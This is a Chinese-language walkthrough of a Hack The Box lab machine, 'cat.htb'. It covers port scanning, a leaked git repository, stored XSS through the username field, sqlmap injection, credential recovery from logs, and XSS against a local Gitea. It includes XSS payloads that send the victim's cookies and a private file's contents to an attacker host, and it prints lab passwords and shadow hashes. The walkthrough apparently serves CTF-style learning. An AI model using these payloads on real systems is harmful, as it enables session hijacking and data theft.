基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 13:27 CST
Nmap scan report for 10.10.11.53
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.08 seconds

80

需要加hosts:

1
10.10.11.53 cat.htb

猫猫竞赛网站🐱:

目录扫描

目录扫描发现git泄露:

1
2
3
4
5
6
7
8
9
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://cat.htb/

/.git/config          (Status: 200) [Size: 92]
/admin.php            (Status: 302) [Size: 1] [--> /join.php]
/css                  (Status: 301) [Size: 300] [--> http://cat.htb/css/]
/img                  (Status: 301) [Size: 300] [--> http://cat.htb/img/]
/index.php            (Status: 200) [Size: 3075]
/server-status        (Status: 403) [Size: 272]
/uploads              (Status: 301) [Size: 304] [--> http://cat.htb/uploads/]

git dump

常规git dump:

1
git-dumper http://cat.htb//.git/ cat_git

XSS filter bypass

查看代码可以看到提交参赛猫猫信息的时候很严格的XSS过滤:

但只过滤了猫猫相关信息,没有过滤owner,即我们的用户名:

所以我们使用XSSpayload作为用户名,测试提交参赛猫咪信息,可以看到callback:

1
<script src="http://10.10.14.11:7777/xss.js"></script>

XSS

xss得到admin cookie,替换后刷新,现在我们是admin:

1
PHPSESSID=179lnimkp5p8dpd6l69hav74ng

xss.js

1
2
3
var xhr=new XMLHttpRequest();
xhr.open("GET", "http://10.10.14.11:7777/?"+document.cookie, true);
xhr.send();

sql注入

然后查看admin相关功能代码,view cat接收cat_id,但有强制类型转换:

accept cat使用catName直接带入到语句中:

所以accept cat请求的catName注入,直接sqlmap即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
sqlmap -r sql.txt -p catName --dbms sqlite --level 5 --risk 3 -v 3 --technique=BEST --tables

+-----------------+
| accepted_cats   |
| cats            |
| sqlite_sequence |
| users           |
+-----------------+

sqlmap -r sql.txt -p catName --dbms sqlite --level 5 --risk 3 -v 3 --technique=BEST -T users --dump

rosa ac369922d560f17d6eeb8b2c7dec498c
# cmd5有
soyunaprincesarosa

rosa to axel

得到的账号密码登录,rosa在adm组:

log

adm有权限查看log,很简单的过滤得到axel:

1
2
3
4
5
grep -irn  password /var/log | grep axel

/var/log/apache2/access.log.1:347414:127.0.0.1 - - [04/Feb/2025:23:59:54 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"

axel aNdZwgC4tI9gnVXv_e3Q

user flag

axel用户登录:

mail

axel登录时提示有新邮件,查看内容,提到本地3000端口gitea:

Gitea

转发端口出来查看:

1
ssh axel@10.10.11.53 -L 3000:127.0.0.1:3000

Gate 1.22.0,axel账号密码可以登录,但看不到提到的那个Employee-management项目:

搜索可以找到gitea相关xss漏洞;

所以应该是要xss去查看对应项目,并且邮件中还提到发邮件给jobert@localhost,所以就是xss打jobert,jobert有权限去查看对应项目

xss

一步步,创建repo,修改描述为xss payload

之后就是发邮件给jobert,服务器没对外开smtp,直接在机器本地用sendmail发:

1
echo -e "Subject: test \n\nhttp://localhost:3000/axel/miao" | sendmail jobert@localhost

得到对应页面内容:

其中包含admin密码:

1
2
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

xss payload

1
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.14.11:7777/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS test</a>

root flag

读取到的密码就是root密码:

1
IKw75eR0MR7CMIxhH0

shadow

1
2
3
4
root:$6$gZWufTq2.hEhrNx3$9xZG.3MLpfYOJo8EN24H5CoT5sJ24F7vWeky5tU4QTZ1sVKwngFUxfbAqlorjEP.aliWJZA7jS3Bxnc5HvKiH1:19994:0:99999:7:::
axel:$6$Qin7PtKZAmITZJvt$dNoqvN0S7anYjIHW6nwrene2XI1vBCg49koRHVpnJlCYdDn75QLsL.5CStdukiXRejTMKaHSbckmlCfaf47jn1:19882:0:99999:7:::
rosa:$6$Gcl0Zhl7CRxJqHRi$CG7HwjG/OoMBS3hnrs9m6.Wgs.CxQ.xFNqI2VTN/xMZifc06kxRUh6xgS1/wIrhObeLnqcYDTQlFi2lN0eyXS/:19966:0:99999:7:::
jobert:$6$AYGcjhL4z59iTO0E$degFih9k1URjYwU7lMH3YKIXQEL5DfU1y833UEItzgQJgmBBsv55SW.R6EAMFUKegShaWmCPAlNfGhPxvLqW6.:19965:0:99999:7:::

参考资料